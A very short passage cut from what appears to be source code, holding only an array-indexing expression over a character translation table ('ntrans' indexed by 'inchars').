40.ntrans[inchars[ou